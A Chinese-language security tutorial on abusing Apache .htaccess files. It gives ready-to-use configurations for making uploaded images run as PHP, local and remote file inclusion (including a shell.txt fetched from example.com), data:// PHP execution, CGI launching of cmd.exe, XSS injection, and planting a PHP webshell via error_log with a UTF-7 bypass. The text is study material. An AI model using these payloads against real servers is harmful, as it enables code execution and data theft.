Apache .htaccess 文件利用技巧详解<\/h1>

0x1 简介<\/h2>

0x1.1 基本概念<\/h3>
.htaccess<\/code> 文件提供了针对目录改变配置的方法，在一个特定的文档目录中放置包含指令的文件，可以作用于该目录及其所有子目录。<\/p>

支持 #<\/code> 单行注释符<\/li>
支持 \<\/code> 拼接上下两行<\/li>
用户可使用的命令受限于 Apache 的 AllowOverride<\/code> 指令设置<\/li>
<\/ul>
0x1.2 作用范围<\/h3>

作用于 .htaccess<\/code> 文件所在目录及其所有子目录<\/li>
子目录中的指令会覆盖父目录或主配置文件中的指令<\/li>
配置指令按查找顺序依次生效<\/li>
<\/ul>
0x1.3 配置文件<\/h3>
启用 .htaccess<\/code> 需要在主配置文件中设置：<\/p>
AllowOverride All<\/span>  # 启动.htaccess文件的使用
<\/span><\/span><\/code><\/pre>可修改 .htaccess<\/code> 文件名：<\/p>
AccessFileName .config  # 将.htaccess修改为.config
<\/span><\/span><\/code><\/pre>0x2 常见指令<\/h2>
0x2.1 SetHandler<\/h3>
强制所有匹配的文件被指定处理器处理：<\/p>
SetHandler handler-name|None
<\/span><\/span><\/code><\/pre>示例：<\/p>
SetHandler application\/x-httpd-php  # 当前目录及其子目录下所有文件都会被当做PHP解析
<\/span><\/span>SetHandler server-status  # 查看Apache服务器状态信息，访问任意不存在文件加?refresh=5自动刷新
<\/span><\/span><\/code><\/pre>0x2.2 AddHandler<\/h3>
在文件扩展名与特定处理器之间建立映射：<\/p>
AddHandler handler-name extension [extension] ...
<\/span><\/span><\/code><\/pre>示例：<\/p>
AddHandler cgi-script .xxx  # 将.xxx文件作为CGI脚本处理
<\/span><\/span><\/code><\/pre>0x2.3 AddType<\/h3>
将文件扩展名映射到指定的内容类型：<\/p>
AddType media-type extension [extension] ...
<\/span><\/span><\/code><\/pre>示例：<\/p>
AddType application\/x-httpd-php .gif  # 将.gif文件当做PHP解析
<\/span><\/span>AddType application\/x-httpd-php png jpg gif  # 将多个后缀当做PHP解析
<\/span><\/span><\/code><\/pre>0x2.4 php_value<\/h3>
修改PHP配置设定（需要 AllowOverride Options<\/code> 或 AllowOverride All<\/code> 权限）：<\/p>
php_value name value
<\/span><\/span><\/code><\/pre>可利用的PHP配置选项：<\/p>

文件包含配置：
php_value auto_prepend_file images.png  # 在主文件解析前自动包含
<\/span><\/span>php_value auto_append_file images.png   # 在主文件解析后自动包含
<\/span><\/span><\/code><\/pre><\/li>
绕过preg_match：
php_value pcre.backtrack_limit 0<\/span>
<\/span><\/span>php_value pcre.jit 0<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x2.5 php_flag<\/h3>
设置布尔值的PHP配置指令：<\/p>
php_flag name on<\/span>|off
<\/span><\/span><\/code><\/pre>示例：<\/p>
php_flag engine 0<\/span>  # 关闭PHP解析，造成源码泄露
<\/span><\/span><\/code><\/pre>0x3 利用方式<\/h2>
0x3.1 文件解析<\/h3>
上传 .htaccess<\/code> 使图片文件被解析为PHP：<\/p>
方法1 - SetHandler：<\/p>
<FilesMatch<\/span> "images.png"<\/span>><\/span>
<\/span><\/span>    SetHandler application\/x-httpd-php
<\/span><\/span><\/FilesMatch><\/span>
<\/span><\/span><\/code><\/pre>方法2 - AddType：<\/p>
AddType application\/x-httpd-php .png
<\/span><\/span><\/code><\/pre>0x3.2 文件包含<\/h3>
本地文件包含<\/h4>
php_value auto_prepend_file \/etc\/passwd<\/span>
<\/span><\/span>php_value auto_append_file \/etc\/passwd<\/span>
<\/span><\/span><\/code><\/pre>远程文件包含（需 all_url_include<\/code> 开启）<\/h4>
php_value auto_append_file http:\/\/example.com\/shell.txt
<\/span><\/span><\/code><\/pre>0x3.3 源码泄露<\/h3>
php_flag engine 0<\/span>
<\/span><\/span><\/code><\/pre>0x3.4 代码执行<\/h3>

利用伪协议（需 all_url_fopen<\/code>、all_url_include<\/code> 开启）：<\/li>
<\/ol>
php_value auto_append_file data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOw==
<\/span><\/span>php_value auto_append_file data:\/\/text\/plain,%3C%3Fphp+phpinfo%28%29%3B
<\/span><\/span><\/code><\/pre>
解析 .htaccess<\/code> 本身：<\/li>
<\/ol>
php_value auto_append_file .htaccess#<?php phpinfo();
<\/span><\/span><\/code><\/pre>或<\/p>
<Files<\/span> ~ "^.ht"<\/span>><\/span>
<\/span><\/span>    Require all<\/span> granted
<\/span><\/span>    Order allow,deny
<\/span><\/span>    Allow from all<\/span>
<\/span><\/span><\/Files><\/span>
<\/span><\/span>SetHandler application\/x-httpd-php# <?php phpinfo(); ?>
<\/span><\/span><\/code><\/pre>0x3.5 命令执行<\/h3>
CGI启动（需加载 cgi_module<\/code>）<\/h4>
Options ExecCGI
<\/span><\/span>AddHandler cgi-script .xx
<\/span><\/span><\/code><\/pre>ce.xx<\/code> 文件内容：<\/p>
#!C:\/Windows\/System32\/cmd.exe \/k start calc.exe
<\/code><\/pre>
FastCGI启动（需加载 mod_fcgid.so<\/code>）<\/h4>
Options +ExecCGI
<\/span><\/span>AddHandler fcgid-script .xx
<\/span><\/span>FcgidWrapper "C:\/Windows\/System32\/cmd.exe \/k start calc.exe"<\/span> .xx
<\/span><\/span><\/code><\/pre>0x3.6 XSS<\/h3>
highlight_file方式<\/h4>
php_value highlight.comment '"<\/span>><script>alert(1);<\/script>'
<\/span><\/span><\/code><\/pre>错误消息链接方式<\/h4>
php_flag display_errors 1<\/span>
<\/span><\/span>php_flag html_errors 1<\/span>
<\/span><\/span>php_value docref_root "'><script>alert(1);<\/script>"<\/span>
<\/span><\/span><\/code><\/pre>0x3.7 自定义错误文件<\/h3>
error.php<\/code> 内容：<\/p>
<?<\/span>php<\/span> include<\/span>('shell'<\/span>); # 报错页面
<\/span><\/span><\/span><\/code><\/pre>.htaccess<\/code> 内容：<\/p>
php_value error_log \/tmp\/www\/html\/shell.php<\/span>
<\/span><\/span>php_value include_path "<?php phpinfo(); __halt_compiler();"<\/span>
<\/span><\/span><\/code><\/pre>UTF-7绕过方式：<\/p>
php_value error_log \/tmp\/shell<\/span>
<\/span><\/span>php_value include_path "+ADw?php phpinfo()+ADs +AF8AXw-halt+AF8-compiler()+ADs"<\/span>
<\/span><\/span>php_value include_path "\/tmp"<\/span>
<\/span><\/span>php_flag zend.multibyte 1<\/span>
<\/span><\/span>php_value zend.script_encoding "UTF-7"<\/span>
<\/span><\/span><\/code><\/pre>